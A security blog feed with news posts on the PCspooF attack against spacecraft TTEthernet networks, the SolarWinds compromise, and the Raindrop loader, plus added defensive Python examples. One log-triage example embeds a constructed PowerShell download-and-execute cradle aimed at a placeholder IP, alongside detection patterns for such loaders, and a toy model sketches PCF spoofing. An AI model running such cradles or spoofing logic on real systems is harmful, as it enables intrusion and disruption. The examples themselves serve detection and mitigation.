Orion Archives – Gridinsoft Blog (https://gridinsoft.com/blogs/tag/orion/), feed last updated Fri, 18 Nov 2022 13:00:47 +0000

PCspoF Attack Could Disable Orion Spacecraft
https://gridinsoft.com/blogs/pcspof-and-the-orion-spacecraft/
Thu, 17 Nov 2022 14:31:10 +0000

The post PCspoF Attack Could Disable Orion Spacecraft appeared first on Gridinsoft Blog.

A team of researchers from the University of Michigan, the University of Pennsylvania, and NASA have detailed a TTEthernet (Time-Triggered Ethernet) PCspoF attack that could disable the Orion spacecraft.

Experts say vulnerabilities in this network technology, which is widely used in the space and aviation industries, could have catastrophic consequences for critical systems, including the disruption of NASA missions.

Let me remind you that we also wrote that NASA has faced 6000 cyberattacks in the past four years, and also that Malware Hides in Images from the James Webb Telescope.

TTEthernet turns ordinary Ethernet into a deterministic network with guaranteed transfer times between nodes, which significantly expands what the classic Ethernet standard can be used for. In such a mixed-criticality network, traffic with different timing and fault-tolerance requirements can coexist.

In practice, TTEthernet lets time-critical traffic (from devices that send tightly synchronized messages according to a predetermined schedule) use the same switches that handle non-critical traffic, such as passenger Wi-Fi on airplanes.

TTEthernet is also compatible with the standard Ethernet used in conventional systems. It isolates time-triggered traffic from so-called best-effort traffic, i.e., the traffic of non-critical systems, by scheduling best-effort messages around the more important time-triggered traffic.

This allows different devices to share one network: mission-critical systems can run on cheaper network equipment, and the two types of traffic are not supposed to interfere with each other.

The creators of PCspooF say that TTEthernet is essentially the “backbone of the network” in spacecraft, including NASA’s Orion spacecraft, the Lunar Gateway space station, and the Ariane 6 launch vehicle, and describe it as a “contender” to replace the Controller Area Network (CAN) bus and the FlexRay protocol.

According to the researchers, PCspooF is the first attack to break the isolation between the two classes of traffic. It works by subverting the synchronization mechanism: Protocol Control Frames (PCFs), the messages that keep every device on the shared schedule and make their timely communication possible.


The researchers found that non-critical best-effort devices can infer private information about the time-triggered part of the network, and that they can be used to craft malicious synchronization messages. A malicious non-critical device can thereby break the isolation guarantee of a TTEthernet network.


The compromised best-effort device then injects electromagnetic interference (EMI) into the switch over the Ethernet cable, tricking the switch into forwarding the attacker’s fake synchronization messages to the other TTEthernet devices.


Once the attack is launched, TTEthernet devices lose synchronization and have to re-integrate into the network. They can be out of sync for up to a second, during which dozens of time-triggered messages cannot be delivered, and critical systems that depend on them can fail. In the worst case, the researchers explain, PCspooF provokes such failures simultaneously on all TTEthernet devices in the network.

To test PCspooF, the experts used NASA hardware and software components to simulate an asteroid redirection mission in which Orion had to dock with a robotic spacecraft. The PCspooF attack forced Orion to deviate from its course and the docking failed completely.

After successfully testing the attack, researchers reported the issue to organizations using TTEthernet, including NASA, the European Space Agency (ESA), Northrop Grumman Space Systems, and Airbus Defense and Space. Now, based on the data from the researchers, NASA is revising the protocols for onboard experiments and testing its off-the-shelf commercial equipment.

As protection against PCspooF and its consequences, the experts recommend several measures: optical isolation or surge protection on links to block conducted electromagnetic interference; checking source MAC addresses so that a PCF is only accepted from a genuine sync master; hiding key PCF fields; using a link-layer authentication protocol such as IEEE 802.1AE (MACsec); increasing the number of sync masters; and disabling dangerous state transitions in the synchronization protocol.

Space technology does not guarantee absolute protection, and there are examples of real attacks. For example, the media reported that DoppelPaymer ransomware operators hacked a NASA contractor.
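To make the mechanism and the countermeasures concrete, here is an added toy model written for this page; it is not the researchers’ code and does not implement the real TTEthernet frame format. The PCF layout, the link key, the port numbers and MAC addresses are invented for the demo, and the “EMI” effect is modelled crudely as the switch losing the first bytes of an incoming frame, so that a PCF buried inside an ordinary best-effort payload is read as if it started the frame. Three of the mitigations listed above are then applied: accepting PCFs only from a sync-master port and MAC, verifying a link-layer authentication tag (an HMAC standing in for a MACsec integrity check), and letting a sync client apply a clock correction only when a majority of the configured sync masters agree.

```python
"""Toy model (added example, not the researchers' code or real TTEthernet) of
PCF spoofing via a best-effort device, and of three countermeasures: ingress
port / source-MAC checks, link-layer authentication, and sync-master voting.
Frame layout, key, ports and MACs below are invented for the demo."""
import hashlib
import hmac
import struct
from collections import Counter
from dataclasses import dataclass

PCF_TYPE = 0x02                       # hypothetical marker byte for a Protocol Control Frame
TAG_LEN = 8
PCF_LEN = 1 + 2 + 2 + TAG_LEN         # type | integration cycle | clock correction (ns) | auth tag
LINK_KEY = b"constructed-demo-key"    # stand-in for an IEEE 802.1AE (MACsec) session key
SYNC_MASTER_PORTS = {1, 2, 3}         # switch ports that have a sync master behind them
SYNC_MASTER_MACS = {"02:00:00:00:00:01", "02:00:00:00:00:02", "02:00:00:00:00:03"}
BE_PORT = 9                           # port of the non-critical (best-effort) device


@dataclass
class Frame:
    ingress_port: int
    src_mac: str
    payload: bytes


def build_pcf(cycle: int, correction_ns: int, authenticate: bool = True) -> bytes:
    """A sync master's PCF; authenticate=False leaves the tag empty (legacy, unauthenticated)."""
    body = struct.pack(">BHh", PCF_TYPE, cycle, correction_ns)
    tag = hmac.new(LINK_KEY, body, hashlib.sha256).digest()[:TAG_LEN] if authenticate else bytes(TAG_LEN)
    return body + tag


def parse_pcf(payload: bytes):
    """(cycle, correction_ns, tag) if the bytes look like a PCF, else None."""
    if len(payload) < PCF_LEN or payload[0] != PCF_TYPE:
        return None
    _, cycle, correction = struct.unpack(">BHh", payload[:5])
    return cycle, correction, payload[5:PCF_LEN]


def emi_glitch(payload: bytes, dropped_leading_bytes: int) -> bytes:
    """Crude stand-in for the conducted-EMI effect the attack relies on: the switch loses
    the first bytes of the incoming frame, so a PCF that the attacker buried inside an
    ordinary best-effort payload now sits where the switch expects a frame to start."""
    return payload[dropped_leading_bytes:]


def naive_switch_forwards_pcf(frame: Frame) -> bool:
    """Content-based handling: whatever parses as a PCF is fanned out to the TT ports."""
    return parse_pcf(frame.payload) is not None


def hardened_switch_forwards_pcf(frame: Frame) -> bool:
    """Accept a PCF only from a sync-master port and MAC, and only with a valid link-layer tag."""
    pcf = parse_pcf(frame.payload)
    if pcf is None:
        return False
    if frame.ingress_port not in SYNC_MASTER_PORTS or frame.src_mac not in SYNC_MASTER_MACS:
        return False                                   # PCF arriving from a best-effort port: drop
    expected = hmac.new(LINK_KEY, frame.payload[:5], hashlib.sha256).digest()[:TAG_LEN]
    return hmac.compare_digest(expected, pcf[2])       # forged or untagged PCF: drop


def sync_client_correction(received, n_sync_masters: int) -> int:
    """Clock correction a sync client applies from the PCFs of one integration cycle.

    received: list of (src_mac, payload). One vote per source; the correction is applied
    only if more than half of the configured sync masters agree on it, otherwise 0.
    With a single sync master any PCF that reaches the client is trusted, which is the
    case the researchers' 'increase the number of sync masters' advice addresses."""
    votes, seen = Counter(), set()
    for src, payload in received:
        pcf = parse_pcf(payload)
        if pcf is None or src in seen:
            continue
        seen.add(src)
        votes[pcf[1]] += 1
    if not votes:
        return 0
    correction, count = votes.most_common(1)[0]
    return correction if count * 2 > n_sync_masters else 0


if __name__ == "__main__":
    # Best-effort data that hides a PCF four bytes in; harmless until the glitch shifts it.
    hidden = b"\x00\x00\x00\x00" + build_pcf(7, 30000, authenticate=False)
    spoofed = Frame(BE_PORT, "02:00:00:00:00:99", emi_glitch(hidden, 4))
    print("naive switch forwards spoofed PCF:", naive_switch_forwards_pcf(spoofed))
    print("hardened switch forwards spoofed PCF:", hardened_switch_forwards_pcf(spoofed))
    print("client with 1 master applies:", sync_client_correction([(spoofed.src_mac, spoofed.payload)], 1))
```

The two switch functions show why the source checks and the authentication tag are listed as separate mitigations: the port/MAC check stops the best-effort device, while the tag also stops a compromised device that happens to sit on a sync-master port. The voting function shows the residual risk on legacy gear that cannot be upgraded, where only redundancy across sync masters limits what one forged frame can do.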

Microsoft Says Over 1,000 Developers Worked on SolarWinds Attack
https://gridinsoft.com/blogs/microsoft-says-about-developers-that-worked-on-solarwinds-attack/
Tue, 16 Feb 2021 16:47:08 +0000

In an interview with CBS News, Microsoft President Brad Smith said the recent attack on SolarWinds was “the largest and most sophisticated he has ever seen.” According to him, the company’s analysis of the hack suggests that more than 1,000 developers worked on this attack.

At the same time, Smith says that the attackers modified only 4,032 lines of code in Orion, a product that contains millions of lines of code.

Let me remind you that in December 2020 it became known that unknown hackers had attacked SolarWinds and infected its Orion platform with malware. Of the 300,000 SolarWinds customers, only 33,000 were using Orion, and according to official figures the infected version of the platform was installed by approximately 18,000 of them.

As a result, the victims included such giants as Microsoft, Cisco, FireEye, as well as many US government agencies, including the State Department and the National Nuclear Security Administration.

Smith said that more than 500 Microsoft engineers are working on the analysis of this incident, but much more specialists “worked” on the side of the attackers:

“When we analysed everything we found at Microsoft, we asked ourselves how many engineers could be working on these attacks? The answer we received was: well, obviously more than a thousand,” said Brad Smith.

Since the attack is attributed to a Russian-speaking hacking group that cybersecurity experts track under the names StellarParticle (CrowdStrike), UNC2452 (FireEye), and Dark Halo (Volexity), Smith also compared the SolarWinds hack to the large-scale attacks on Ukraine, which are likewise attributed to Russia (although the Russian authorities deny involvement).

The head of FireEye, Kevin Mandia, also spoke to reporters and explained the recent events.

As it turned out, the compromise at FireEye was discovered almost by accident. To log into the company’s VPN remotely, employees need a two-factor authentication code, and their accounts are tied to phone numbers. FireEye’s security team noticed that one employee’s account had two phone numbers linked to it.

“When this person was called and asked if he really had two numbers or devices, he replied that he had not done anything like that. It turned out that the second number was tied to the account by the attackers,” said Kevin Mandia.
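The signal Mandia describes, a second MFA phone quietly added to an existing account, is cheap to hunt for in identity-provider audit logs. Below is an added example, not FireEye’s or anyone else’s detection, that runs over a constructed sample of JSON audit events. The event names (`login.success`, `mfa.factor.enroll`), field names and phone numbers are invented for the demo. It raises an alert when a phone factor is enrolled on an account that already has one, and enriches the alert with whether the enrollment came from an IP address the user has never successfully logged in from.

```python
"""Added example: flag MFA phone enrollments that look like an attacker adding their own
number to a victim's account. Log format, event names and data are constructed."""
import json
from collections import defaultdict

# Constructed identity-provider audit events, newline-delimited JSON (not real logs).
SAMPLE_LOG = """
{"ts":"2020-11-02T08:01:10Z","event":"login.success","user":"jdoe","ip":"203.0.113.7","factor":"sms:+15550100001"}
{"ts":"2020-11-03T08:03:22Z","event":"login.success","user":"jdoe","ip":"203.0.113.7","factor":"sms:+15550100001"}
{"ts":"2020-11-20T02:14:05Z","event":"mfa.factor.enroll","user":"jdoe","ip":"198.51.100.42","factor":"sms:+15550100002"}
{"ts":"2020-11-20T02:15:40Z","event":"login.success","user":"jdoe","ip":"198.51.100.42","factor":"sms:+15550100002"}
{"ts":"2020-11-21T09:00:00Z","event":"mfa.factor.enroll","user":"asmith","ip":"203.0.113.9","factor":"sms:+15550100003"}
{"ts":"2020-11-21T09:01:00Z","event":"login.success","user":"asmith","ip":"203.0.113.9","factor":"sms:+15550100003"}
"""


def parse_events(text: str) -> list:
    """Parse NDJSON audit events and return them in timestamp order (ISO-8601 sorts lexically)."""
    events = [json.loads(line) for line in text.strip().splitlines() if line.strip()]
    return sorted(events, key=lambda e: e["ts"])


def find_suspicious_enrollments(events: list) -> list:
    """Walk events in order, tracking per-user phone factors and IPs with prior logins.

    Alert on an SMS enrollment for a user who already has an SMS factor (the FireEye case:
    two phone numbers on one account). A first-ever enrollment is treated as onboarding."""
    phones = defaultdict(set)      # user -> phone factors seen in use or enrolled
    known_ips = defaultdict(set)   # user -> source IPs of earlier successful logins
    alerts = []
    for e in events:
        user, factor = e["user"], e.get("factor", "")
        if e["event"] == "login.success":
            known_ips[user].add(e["ip"])
            if factor.startswith("sms:"):
                phones[user].add(factor)       # a factor used at login is an existing factor
        elif e["event"] == "mfa.factor.enroll" and factor.startswith("sms:"):
            if phones[user] and factor not in phones[user]:
                reasons = ["additional phone factor on an account that already has one"]
                if e["ip"] not in known_ips[user]:
                    reasons.append("enrolled from an IP with no prior successful login for this user")
                alerts.append({"ts": e["ts"], "user": user, "factor": factor,
                               "ip": e["ip"], "reasons": reasons})
            phones[user].add(factor)
    return alerts


if __name__ == "__main__":
    for alert in find_suspicious_enrollments(parse_events(SAMPLE_LOG)):
        print(json.dumps(alert))
```

The second reason is deliberately only an enrichment rather than a condition: a legitimate user replacing a lost phone from a new location would trigger it too, so the decisive signal stays the one FireEye acted on, namely that the account ended up with two phones. The follow-up is the same as Mandia’s: call the user.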

Let me remind you that Microsoft says SolarWinds hackers hunted for access to cloud resources.

Raindrop is another malware detected during the SolarWinds hack
https://gridinsoft.com/blogs/raindrop-is-another-malware-detected-during-the-solarwinds-hack/
Wed, 20 Jan 2021 16:29:43 +0000

Symantec specialists have discovered Raindrop, another piece of malware used during the attack on SolarWinds alongside the malware already known.

According to the researchers, Raindrop was used in the final stages of the attack and was deployed only on the networks of a few selected targets (only four samples have been found).

Let me remind you that SolarWinds, which develops software that helps enterprises manage their networks, systems and infrastructure, was hacked in mid-2019. This supply-chain attack is attributed to an allegedly Russian-speaking hacking group that information security experts track under the names StellarParticle (CrowdStrike), UNC2452 (FireEye) and Dark Halo (Volexity).

“After infiltrating the SolarWinds network, the attackers provided Orion’s centralized monitoring and control platform with malicious updates. As a result, many SolarWinds customers installed an infected version of the platform and unintentionally let the hackers into their networks,” Symantec experts recap the course of the attack.

Among the victims are such giants as Microsoft, Cisco and FireEye, as well as many US government agencies, including the US Department of State and the National Nuclear Security Administration.

Microsoft researchers also reported that the Supernova and CosmicGale malware was detected on systems running SolarWinds software.

Additionally, as it became known earlier from reports of other information security experts, the attackers first deployed the Sunspot malware on the SolarWinds network.

CrowdStrike analysts wrote that this malware was used to inject the Sunburst backdoor into Orion’s code. The infected versions of Orion went undetected and were active between March and June 2020, during which time companies using Orion were compromised. According to official figures, of the 300,000 SolarWinds customers only 33,000 were using Orion, and the infected version of the platform was installed on the machines of approximately 18,000 of them. At the same time, the hackers developed their attack further only in rare cases, carefully choosing large targets among the victims.

Sunburst itself did relatively little: it collected information about the infected network and transmitted this data to a remote server. If the malware operators then decided that the victim was a promising target, they removed Sunburst and replaced it with the more powerful Teardrop backdoor.

However, Symantec now reports that in some cases the attackers chose to use Raindrop instead of Teardrop. Both backdoors have similar functionality and are characterized by the researchers as a “loader for the Cobalt Strike Beacon”, that is, they were used to expand the attackers’ access within the compromised network. Raindrop and Teardrop also have differences, which the researchers listed in the table below.

Raindrop malware for SolarWinds (comparison table of Raindrop and Teardrop, published as an image in the original post)

The way the malware was deployed was also different. The widely used Teardrop backdoor was installed directly by Sunburst, while Raindrop appeared on victims’ systems where Sunburst was also present without any direct evidence that Sunburst initiated its installation.

It must be said that earlier reports from specialists already mentioned that Sunburst was used to launch various fileless PowerShell payloads, many of which left almost no traces on infected hosts. It can be assumed that the mysterious “appearance” of Raindrop on victims’ systems was the result of exactly these operations.
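Fileless PowerShell stages of the kind mentioned above leave little on disk, but with script block logging enabled the PowerShell engine records the de-obfuscated text of what it executes (Microsoft-Windows-PowerShell/Operational, event ID 4104). Here is an added example, not Symantec’s, CrowdStrike’s or any vendor’s detection logic, that triages a constructed batch of such events: it unwraps `-EncodedCommand` arguments (base64 of UTF-16LE) and scores each block against indicators typical of in-memory loaders, such as download cradles, `Invoke-Expression`, reflective assembly loading and base64-decoded blobs. The sample events, including the encoded cradle, are built inline for the demo.

```python
"""Added example: triage PowerShell script-block log entries (event ID 4104) for
fileless-loader indicators. Sample events are constructed, not real SolarWinds artefacts."""
import base64
import re

# A constructed download cradle, wrapped the way -EncodedCommand expects (base64 of UTF-16LE).
DECODED_CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.5/stage2.ps1')"
ENCODED_CRADLE = base64.b64encode(DECODED_CRADLE.encode("utf-16-le")).decode()

SAMPLE_4104 = [  # constructed ScriptBlockText values, as a log shipper would hand them over
    {"EventID": 4104, "ScriptBlockText": "Get-ChildItem C:\\Windows\\Temp | Sort-Object LastWriteTime"},
    {"EventID": 4104, "ScriptBlockText": f"powershell.exe -nop -w hidden -EncodedCommand {ENCODED_CRADLE}"},
    {"EventID": 4104, "ScriptBlockText":
        "[System.Reflection.Assembly]::Load([Convert]::FromBase64String($blob)).EntryPoint.Invoke($null,$null)"},
]

# Indicators of in-memory staging; each is a weak signal alone, so triage needs several.
INDICATORS = {
    "download_cradle": re.compile(r"Net\.WebClient|Invoke-WebRequest|DownloadString|DownloadFile", re.I),
    "invoke_expression": re.compile(r"\b(?:IEX|Invoke-Expression)\b", re.I),
    "in_memory_assembly_load": re.compile(r"Reflection\.Assembly\]::Load", re.I),
    "base64_decode": re.compile(r"FromBase64String", re.I),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
}
# -EncodedCommand and its short forms (-enc, -ec, -e) followed by a base64 blob.
ENCODED_ARG = re.compile(r"-e(?:ncodedcommand|nc|c)?\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(text: str):
    """Return the decoded -EncodedCommand payload if the block carries one, else None."""
    m = ENCODED_ARG.search(text)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_script_block(text: str) -> list:
    """Sorted list of indicator names found in a script block, after unwrapping any encoded command."""
    found = set()
    decoded = decode_encoded_command(text)
    if decoded is not None:
        found.add("encoded_command")
        text = text + "\n" + decoded          # scan the wrapper and the decoded payload together
    for name, pattern in INDICATORS.items():
        if pattern.search(text):
            found.add(name)
    return sorted(found)


def triage(events: list, min_indicators: int = 2) -> list:
    """Keep events with at least min_indicators hits; returns (script prefix, indicators)."""
    hits = []
    for event in events:
        if event.get("EventID") != 4104:
            continue
        indicators = analyze_script_block(event["ScriptBlockText"])
        if len(indicators) >= min_indicators:
            hits.append((event["ScriptBlockText"][:40], indicators))
    return hits


if __name__ == "__main__":
    for prefix, indicators in triage(SAMPLE_4104):
        print(f"{prefix!r}: {', '.join(indicators)}")
```

Script block logging is the control that makes this possible at all: without it, a loader that never touches disk leaves only the process creation event, and the base64 blob in a command line can be truncated or absent in that record.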

Let me remind you that Google experts exposed sophisticated hacking campaign against Windows and Android users.
